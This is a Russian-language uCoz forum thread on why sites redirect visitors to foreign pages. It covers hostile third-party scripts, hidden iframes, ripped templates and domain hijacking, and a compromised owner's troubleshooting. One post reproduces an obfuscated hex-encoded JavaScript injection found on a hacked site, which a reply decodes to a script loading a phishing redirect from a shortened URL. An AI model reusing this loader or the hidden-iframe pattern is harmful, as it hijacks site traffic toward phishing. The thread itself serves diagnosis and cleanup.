Модератор форума: Yuri_G  
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
Andro
Сообщений: 27
Репутация: 3

Сообщение # 766 | 12:31:47
webanet,
Все получилось, спасибо!

Остался только вопрос: как этот скрипт и файл попали на мой сайт? Был взломан мой пароль? Или это можно сделать без захода на сайт под моим паролем?
Что сделать, чтобы это не произошло еще раз?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 767 | 17:04:42
Скрипт попал на сайт усилиями того, что имеет доступ к файловому менеджеру через админ бар на сайте и доступ к редактированию содержимого страниц. то есть любой пользователь из группы администратор. у вас три администратора, два из которых действующие. и конечно это все можно проделать через панель управления

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Andro
Сообщений: 27
Репутация: 3

Сообщение # 768 | 19:42:40
webanet, Спасибо! Я подумаю об этом.
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 769 | 06:26:52
Пока написала, нашла

С 4 числа был вышит редирект при переходе с ПС на страницу _amsacquisitions.com/wp-content/themes/SBERBANK-ONLINE.RU/.
3го числа был добавлен в список админов этот левый чел http://uid.me/mr.rekoj_mr.rekoj1
Нашла в первом контейнере <script src="//goo.gl/6g1MUX"></script> такое.
Остался вопрос, как в админах появился новый чел( пароли у меня сложные, ну буду менять сейчас.
Если бы человек получил доступ в админку, он бы сделал все от админа и не стал бы назначать права своему аккаунту и с него воротить дела. Шаблон у меня купленный на utemplates. На сайте только проверенная годами реклама - гугл, ледикеш. Прям очень печально, что так ничего непонятно, подарила трафика за выходные пока была в отьезде очень щедро...

Еще в "страницы сайта" был найден такой:
Код
Код<script>var
_0xb4b0=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x36\x67\x31\x4D\x55\x58\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xb4b0[25]](_0xb4b0[0]+
_0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[3]+ _0xb4b0[4]+ _0xb4b0[5]+ _0xb4b0[6]+
_0xb4b0[7]+ _0xb4b0[8]+ _0xb4b0[9]+ _0xb4b0[10]+ _0xb4b0[11]+
_0xb4b0[12]+ _0xb4b0[13]+ _0xb4b0[14]+ _0xb4b0[15]+ _0xb4b0[16]+
_0xb4b0[17]+ _0xb4b0[18]+ _0xb4b0[19]+ _0xb4b0[20]+ _0xb4b0[1]+
_0xb4b0[2]+ _0xb4b0[21]+ _0xb4b0[22]+ _0xb4b0[23]+
_0xb4b0[24])</script>
Это что за код был? Его удаление ничего не дало.
Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 06:35:26
Drinko
Сообщений: 909
Репутация: 773

Сообщение # 770 | 10:48:28
Цитата Oksana5339 ()
Это что за код был?

Если перевести на человеческий:
Код
<script type="text/javascript" src="http://goo.gl/6g1MUX"></script>

Сам скрипт вызывает перенаправление трафика на фишинговый сайт.

Oksane
Сообщений: 35
Репутация: 1

Сообщение # 771 | 19:14:09
Ну да, тот же, что в открытйю так же был прописан. Сейчас захожу с поисковика - опять. Пароли меняла, все удаляла, пароль админа не подошел, хотя я его записала и точно входила. Значит шаблон utemlate с уязвимостью продали или что?

Теперь я не могу пароль сменить, т.к. не знаю, на какой мне его поменяли...
На аккаунте много сайтов, ломают только 1
Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:17:10
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 772 | 19:20:58
Oksana5339, укажите адрес сайта

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 773 | 19:24:48
webanet, muzh-zh*ena.ru
Только что удалила из 2 мест снова, на этот раз поставили хитрее. В страницы сайта - после многих переносов строк, в первый контейнер в середину.
И сохранить дамп БД я не могу, видимо этот человек сделал уже (1 раз в 7 дней же)
Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:32:29
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 774 | 19:36:08
Oksana5339, не удаляйте то что вы удаляете. нужно осмотреть что к чему. попробуйте перейти снова из поисковика
как только появится снова напишите сразу сюда или в тех.поддержку и ничего не трогайте

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 775 | 19:38:30
webanet, удалила сейчас в 2 местах <script src="//goo.gl/6g1MUX"></script>
Перехожу с поисковика - все ок.

Но что толку, если сегодня уже удаляла и все было ок? Пароль админа мне сменили, я теперь не могу его поменять...
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 776 | 19:47:49
Oksana5339, вы какой пароль меняли? пароль uid профиля или пароль администратора? пробовали старый пароль ввести при входе в пу?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 777 | 19:55:01
webanet, меняла только пароль сайта, хотела уид, но реально не нашла, где и писала в поддержку.

Думала раньше, что не сильно тупая, но что-то не поняла.

Старый пароль пробовала ввести, не помогло. И я точно с новым после смены входила.

По логам
03.02.2017, 20:22 /index; editing site page mrrekoj (Администраторы) 94.46.163.230 Page ID: 1.
Сегодня в логах никакие действия не прописаны. Орудовали с админки очевидно

Добавлено (06 Фев 2017, 19:55:01)
---------------------------------------------
Неееет!!! Старый подошел (думала другой был), но я ведь точно входила с новым... Сменила опять, но что-то думаю, смысла в этом не особо. Скоро опять взломают, замкнутый круг

Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:52:46
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 778 | 19:57:51
Oksana5339, а где вы меняете пароль от админки?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 779 | 20:02:02
webanet,
Главная » Безопасность » Замена пароля
Сейчас сменила, вышла, зашла с новым паролем.
Ничего лучше пока чем ограничить вход в админку по айпи - не придумала...
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 780 | 20:06:24
Oksana5339, если появится снова ничего не трогайте и напишите сразу. особенно опишите подробно что вы делали до того как появился вредоносный код снова

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Поиск: